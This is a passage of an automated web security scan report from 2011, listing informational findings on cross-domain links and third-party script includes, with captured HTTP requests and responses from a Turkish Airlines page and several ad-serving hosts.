19.249. http://www.turkishairlines.com/en-CA/quick_search_part.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.turkishairlines.com
Path:   /en-CA/quick_search_part.aspx

Issue detail

The page was loaded from a URL containing a query string.
The response contains the following links to other domains:

Request

GET /en-CA/quick_search_part.aspx?p=reservation HTTP/1.1
Host: www.turkishairlines.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.turkishairlines.com/en-CA/index.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ksso3m55td3pq4almj0x3k45; __utma=1.1413828058.1317599904.1317599904.1317599904.1; __utmb=1.2.10.1317599904; __utmc=1; __utmz=1.1317599904.1.1.utmcsr=manutd.com|utmccn=(referral)|utmcmd=referral|utmcct=/Search-Results.aspx

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:01:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 1771

<div class="">
<div class="title">Manage My Reservations</div>
</div>
<div class="clearfix"></div>
<div class="box-blue radius-4px" style="margin-top: 18px;">
<ul
...[SNIP]...
</span>
<a href="http://www4.thy.com/mybookings/reservations.tk?target=checkCancelConditions.tk&amp;lang=en">Cancellation</a>
...[SNIP]...
</span>
<a href="http://www4.thy.com/mybookings/reservations.tk?target=checkRR.tk&amp;lang=en">Reconfirmation</a>
...[SNIP]...
</span>
<a href="http://www4.thy.com/troyaonline/reissueStart.tk?lang=EN">Rebooking/Reissue</a>
...[SNIP]...
</span>
<a href="http://www4.thy.com/troyaonline/retickStart.tk?lang=en">Pay&amp;Fly</a>
...[SNIP]...
</span>
<a href="http://www4.thy.com/mybookings/reservations.tk?target=view&amp;lang=en">View</a>
...[SNIP]...
</span>
<a href="http://www4.thy.com/mybookings/etinput.tk?lang=en">Your E-Ticket</a>
...[SNIP]...

20. Cross-domain script include
There are 120 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


20.1. http://ad.doubleclick.net/adi/N6010.456584.XAXIS.COM/B5752701.15

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6010.456584.XAXIS.COM/B5752701.15

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /adi/N6010.456584.XAXIS.COM/B5752701.15;sz=728x90;click=http://ib.adnxs.com/click?znuEnuzW1T-HFtnO91PTPwAAAGBmZvY_aFoouqpj1D-qm4u_7QnXPxv3XqCB24t0cEeI8W8QIlnC-IhOAAAAAE1ECABlAQAAbAEAAAIAAACyGQkAPWQAAAAAAABVU0QAVVNEANgCWgD8AdsEbBEDAQUCAQQAAAAAHyfnFwAAAAA./cnd=!sAQDJgiylwcQsrMkGL3IASAA/referrer=http%3A%2F%2Fwww.goal.com/clickenc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLuQ0CQQwF0L9cGmnbILXktedyQAsU4TkkQiogpa5tglYIES9_KxYA18hqI1elPlul2FjIRBt55OzszqIl4HB_f_cVx__w5KOrCHGPk2bNTDMNo20zLlWs9JwCTkC5BZyxfF4BF-D5wA90U0FEcwAAAA%3D%3D%26dst%3D;ord=1317599426? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ib.adnxs.com/if?enc=znuEnuzW1T-HFtnO91PTPwAAAGBmZvY_aFoouqpj1D-qm4u_7QnXPxv3XqCB24t0cEeI8W8QIlnC-IhOAAAAAE1ECABlAQAAbAEAAAIAAACyGQkAPWQAAAAAAABVU0QAVVNEANgCWgD8AdsEbBEBAgUCAQQAAAAAHifUFwAAAAA.&pubclick=http://bid.openx.net/click?cd%3DH4sIAAAAAAAAABXLuQ0CQQwF0L9cGmnbILXktedyQAsU4TkkQiogpa5tglYIES9_KxYA18hqI1elPlul2FjIRBt55OzszqIl4HB_f_cVx__w5KOrCHGPk2bNTDMNo20zLlWs9JwCTkC5BZyxfF4BF-D5wA90U0FEcwAAAA%3D%3D%26dst%3D&tt_code=goal.com&udj=uf%28%27a%27%2C+1008%2C+1317599426%29%3Buf%28%27c%27%2C+117682%2C+1317599426%29%3Buf%28%27g%27%2C+51717%2C+1317599426%29%3Buf%28%27r%27%2C+596402%2C+1317599426%29%3Bppv%2815221%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815223%2C+%278398047279950264091%27%2C+1317599426%2C+1317685826%2C+117682%2C+25661%2C+0%29%3Bppv%2815225%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815227%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815229%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815231%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3B&cnd=!xCOKHwiylwcQsrMkGAAgvcgBMAA4_ANAAEjsAlAAWABgeGgAcAB4AIABAIgBAJABAZgBAaABAagBA7ABALkBxSCwcmiRzT_BAVgGUQHvCdc_yQGamZmZmZnxP9kBf_s6cM6I5D_gAdQv&ccd=!sAQDJgiylwcQsrMkGL3IASAA&referrer=http://www.goal.com&media_subtypes=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7472
Set-Cookie: id=ca5b4d83c000017||t=1317599554|et=730|cs=002213fd4884e3bed7d9e725fe; path=/; domain=.doubleclick.net; expires=Tue, 01 Oct 2013 23:52:34 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sat, 01 Oct 2011 23:52:34 GMT
Date: Sun, 02 Oct 2011 23:52:34 GMT
Expires: Sun, 02 Oct 2011 23:52:34 GMT
Cache-Control: private

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
<!-- Code auto-generated on Thu Sep 01 05:06:56 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...

20.2. http://ad.doubleclick.net/adi/N6054.Invitemedia.com/B5912738.28

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6054.Invitemedia.com/B5912738.28

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /adi/N6054.Invitemedia.com/B5912738.28;sz=300x250;pc=[TPAS_ID];click=http://g.ca.bid.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwdjEsOgzAMBa.CvCYS8Qe_cJvQpCvUXVdV747NyjPS8_xIhI6lQWtbFxIOgZsywmoIYb7Awl5aNxQ9ey_gsZWJOcYb2qcb5WuO3XjztOxk0OLK_tQ08PO9rsA9sJqK._8GBj4bwg--&redirectURL=;ord=8ec82327-9a58-4baa-82d0-e8eddf84ae75? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.goal.com/en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7661
Set-Cookie: id=c28c1d83c000039||t=1317600006|et=730|cs=002213fd48e65c670a029fff3e; path=/; domain=.doubleclick.net; expires=Wed, 02 Oct 2013 00:00:06 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sun, 02 Oct 2011 00:00:06 GMT
Date: Mon, 03 Oct 2011 00:00:06 GMT
Expires: Mon, 03 Oct 2011 00:00:06 GMT
Cache-Control: private

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Wed Sep 21 16:47:44 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
</noscript><script type='text/javascript' language='javascript' src='http://cdn.doubleverify.com/script277.js?agnc=900745&cmp=5912738&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=1&plc=72099485&advid=2590120&sid=902003&adid='></script>
...[SNIP]...

20.3. http://ad.doubleclick.net/adi/N6054.Invitemedia.com/B5912738.30

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6054.Invitemedia.com/B5912738.30

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /adi/N6054.Invitemedia.com/B5912738.30;sz=728x90;pc=[TPAS_ID];click=http://g.ca.bid.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwVjDEOhDAMBL.CXBMpWduxw2_IARW6jgrd38.udkba3ZeYaVuGSxvrQowQNxWktRBCvQA4l30cUqTrUXY7ZznlqlOrf2wy5TTLpqiWlj95oZHc4YES.H3uO7AHNhU2_P7igxtH&redirectURL=;ord=20f22283-a9d4-465d-a7eb-e4f0b508c7b3? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://d.tradex.openx.com/afr.php?zoneid=6393&cb=INSERT_RANDOM_NUMBER_HERE
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7636
Date: Sun, 02 Oct 2011 23:59:52 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Mon Sep 26 17:08:53 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
</noscript><script type='text/javascript' language='javascript' src='http://cdn.doubleverify.com/script277.js?agnc=900745&cmp=5912738&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=1&plc=72099489&advid=2590120&sid=902003&adid='></script>
...[SNIP]...

20.4. http://ad.doubleclick.net/adi/gna.en/level2

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/gna.en/level2

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /adi/gna.en/level2;tile=5;sz=160x600;ord=940345?area=2l&pos=2&league=epl&ord=940345 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.goal.com/en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 562
Date: Mon, 03 Oct 2011 00:00:10 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><script type="text/javascript"><!--
   e9 = new Object();
e9
...[SNIP]...
</script>
<script type="text/javascript" src="http://tags.expo9.exponential.com/tags/Goalcomnew/US/tags.js"></script>
...[SNIP]...

20.5. http://ad.yieldmanager.com/iframe3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /iframe3?Hv0hAJBoGgAnFoYAAAAAAHwwIgAAAAAAAAD8AQIAAAAAAP8A.wD..ziOJgAAAAAAJtcsAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACTIxEAAAAAAAIAAgAAAAAAumx0zk9xnD-6bHTOT3GcP6lNnNzvUKQ.qU2c3O9QpD8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABThIHDCPrRCk1snMRCLBJSPZqa77.0ztS7XLZNAAAAAA==,,http%3A%2F%2Fads.pubmatic.com%2Fhosteddefaulttags%2F26620%2F26621%2F21556%2F559%2Fadtag.html,B%3D10%26Z%3D300x250%26_salt%3D3038281923%26atf%3D1%26brw%3Dcr3%26cb%3D10909902593%26efo%3D0%26os%3Dwn7%26pfm%3D1%26prm%3D0%26r%3D0%26rtg%3Dga%26s%3D1730704%26tphv%3Dch%26ttvl%3Dch%26uatRandNo%3D1419,73842556-ed62-11e0-91db-78e7d1f5a930,1317606792173 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ads.pubmatic.com/HostedDefaultTags/26620/26621/21556/559/adtag.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:53:13 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0050.rm.sp2
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 01:53:13 GMT
Pragma: no-cache
Content-Length: 619
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(8787495);}
</script><script type="te
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

20.6. http://ads.pubmatic.com/HostedThirdPartyPixels/TF/ae_12232010.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pubmatic.com
Path:   /HostedThirdPartyPixels/TF/ae_12232010.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /HostedThirdPartyPixels/TF/ae_12232010.html HTTP/1.1
Host: ads.pubmatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ads.pubmatic.com/AdServer/js/syncuppixels.html?p=26071&s=26072
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; DPFQ=37~4~1315939725; PUBUIDSYNCUPFQ=1~1315939725:4~1315939725; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_26072=TMC; KRTBCOOKIE_80=1336-f96ee651-9aaf-4db4-bcd2-102cf3b7c015.; SyncRTB=1_1318810146.2_1318291877.3_1318810277.4_1318810277.5_1318810277.6_1318810277.7_1318810277; DPSync=23_1317859746.24_1317859877.25_1317859877.26_1317687077; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; KTPCACOOKIE=YES; pubfreq_26072=823-3:1098-3; PUBMDCID=1; _curtime=1317600804; camfreq_126550188=3663-1_1317687204; pubfreq_26072_21043_618709548=243-1; PMDTSHR=cat:; KTPCACOOKIE=YES; SYNCUPPIX_ON=YES

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:14:35 GMT
Expires: Tue, 04 Oct 2011 17:44:41 GMT
Last-Modified: Tue, 29 Mar 2011 14:07:54 GMT
Cache-Control: max-age=172800
Content-Type: text/html; charset=UTF-8
ETag: "7b47ce-1da-961de280"
Accept-Ranges: bytes
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Content-Length: 474

<html>

<body>
<script type="text/javascript"><!--
e9 = new Object();
e9.size = "1x1";
//--></script>
<script type="text/javascript" src="http://tags.expo9.exponential.com/tags/PubmaticAE/AudienceSelect/tags.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://tags.expo9.exponential.com/tags/AudienceSelectPublishers/AudienceSelect/tags.js"></script>
...[SNIP]...

20.7. http://as.chango.com/links/adunit/1.31759988192e+12

Summary

Severity:   Information
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31759988192e+12

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /links/adunit/1.31759988192e+12?adid=13713&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder05-sj-west&bm=1.84336389243&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=guardian.co.uk&dsi=None&ebp=o2FsgIeco3h8bGWkdw&eid=Rubicon&ht=250&ibs=None&kf=202457&kw=Malware+freeware&kwid=5827704&mw=1.0&poo=p&sid=5cadceb4-ed52-11e0-ab71-00259035d426&st=broad&stid=guardian.co.uk&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317599881920&uf=0&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.guardian.co.uk%2Ffootball%2F2011%2Fsep%2F27%2Fmanchester-united-basel-live&wh=300&wp=869757B4845F780B&sig=d9ce9455d859589baae4652880c0ad93 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7845/12566/26848-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_ab=1; _t=b6ae888c-d95b-11e0-b096-0025900e0834; _i_rc=1

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "01bddffbb814f8450036212edceb90ccd4fe74e8"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 2369
Date: Sun, 02 Oct 2011 23:58:03 GMT
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e0834; Domain=chango.com; expires=Wed, 29 Sep 2021 23:58:02 GMT; Path=/
Set-Cookie: cc.i.10449=13713%7Cguardian.co.uk%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Tue, 01 Nov 2011 23:58:02 GMT; Path=/

<html><head><title></title></head><body style='margin:0;padding:0;'><script type="text/javascript">(new Image()).src = 'http://cm.g.doubleclick.net/pixel?nid=chango&partnerId=&referrerURL=&token=b6ae8
...[SNIP]...
</script><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6677.286186.CHANGO/B5866234.13;sz=300x250;ord=1317599882.73;click1=http://as.chango.com/links/click1317599882.73?acid=10699&adid=13713&agid=11720&stid=guardian.co.uk&url=http://www.guardian.co.uk/football/2011/sep/27/manchester-united-basel-live&dom=guardian.co.uk&ibs=None&mw=1.0&poo=p&kwid=5827704&eid=Rubicon&cid=10449&agid=11720&sid=5cadceb4-ed52-11e0-ab71-00259035d426&dc=namemedia&datc=san jose&da=10087&st=broad&bm=1.84336389243&wp=1.5592&kw=Malware+freeware&uf=0&kf=202457&atype=HISTORIC&test=0&adpos=0&bidder=bidder05-sj-west&ioi=13672&ts=1317599881920&sig=d9ce9455d859589baae4652880c0ad93&cu=&dsi=None&clickURL=">
</SCRIPT>
...[SNIP]...

20.8. http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=1&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=771877&tile=128609801075344&section=results

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.travelocity.com
Path:   /html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=1&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=771877&tile=128609801075344&section=results

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=1&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=771877&tile=128609801075344&section=results HTTP/1.1
Host: dm.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travel.travelocity.com/hotel/HotelAvailability.do;jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; NGUserID=a1c4b0d-32323-499133968-1317600484; JSID=74C1C04EA1B1607D7CD2E1313B9B2779.p0617; TUID=b93762e7-3915-4de7-8fff-bd2729b35e5e; Service=TRAVELOCITY; cbHistoryPerm=SG90ZWx8fGJvc3x8fFVTOg==; mbox=session#1317600481056-80236#1317602632|PC#1317600481056-80236.19#1318810372|check#true#1317600832; __utma=1.238001331.1317600529.1317600529.1317600529.1; __utmb=1.3.10.1317600529; __utmc=1; __utmz=1.1317600529.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IPE_S_TMP_910=910; mt.v=1.249362358.1317600494998

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:14:26 GMT
Server: Apache
X-Server: prdlmn0408
AdServer: 10.28.75.14:9678:1
P3P: policyref="http://dm.travelocity.com/w3c/p3p.xml", CP="ALL DSP COR CUR ADM DEVo CONi OUR DEL IND PHY DEM ONL PRE INT PUR CNT UNI NAV COM"
Cache-Control: max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:14:26 GMT
Vary: Accept-Encoding,User-Agent
Pragma: no-cache
Content-Length: 2262
Content-Type: text/html

<IFRAME SRC="http://ad.doubleclick.net/adi/N6333.1207.TRAVELOCITY.COM/B5568861.2;sz=160x600;click=http://dm.travelocity.com/event.ng/Type%3dclick%26FlightID%3d127075%26AdID%3d169968%26TargetID%3d32592
...[SNIP]...
5,9846,11161,12194,12196,12728,12736,12804%26Redirect%3d;ord=AIsqio,bhirWtczqlse?" WIDTH=160 HEIGHT=600 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'>
<SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6333.1207.TRAVELOCITY.COM/B5568861.2;abr=!ie;sz=160x600;ord=AIsqio,bhirWtczqlse?">
</SCRIPT>
...[SNIP]...

20.9. http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=1&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&stars=4.0&hotel=omni_hotels&random=656365&tile=564238840132219&section=details

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.travelocity.com
Path:   /html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=1&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&stars=4.0&hotel=omni_hotels&random=656365&tile=564238840132219&section=details

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=1&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&stars=4.0&hotel=omni_hotels&random=656365&tile=564238840132219&section=details HTTP/1.1
Host: dm.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travel.travelocity.com/hotel/HotelDetail.do;jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617?tab=guide&tripType=hotel&propertyId=4810&airport=BOS&resetReview=true&hotelQKey=-2237575859332798600&tsHotelQKey=-2237575859332798600&reviewPage=reviewStart&locLink=HOTEL.HOTELAVAILABILITYLISTLITE1|NAT1&dr=4810A110Z114273A224Z46356A345Z10677A135Z601A159Z41209A139Z48167A178Z28920A139Z4643A90Z25625A159Z12989A129Z1013A189Z13360A152Z64654A166Z44777A136Z9773A129Z11430A84Z10448A97Z46065A125Z32162A99Z20077A108Z1228A169Z12056A109Z34410A99Z9074A149
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; NGUserID=a1c4b0d-32323-499133968-1317600484; IPE_S_TMP_910=910; JSID=74C1C04EA1B1607D7CD2E1313B9B2779.p0617; TUID=b93762e7-3915-4de7-8fff-bd2729b35e5e; Service=TRAVELOCITY; cbHistoryPerm=SG90ZWx8fGJvc3x8fFVTOg==; __utma=1.238001331.1317600529.1317600529.1317600529.1; __utmb=1.1.10.1317600529; __utmc=1; __utmz=1.1317600529.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mt.v=1.249362358.1317600494998; mbox=session#1317600481056-80236#1317602524|PC#1317600481056-80236.19#1318810264|check#true#1317600724

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:12:46 GMT
Server: Apache
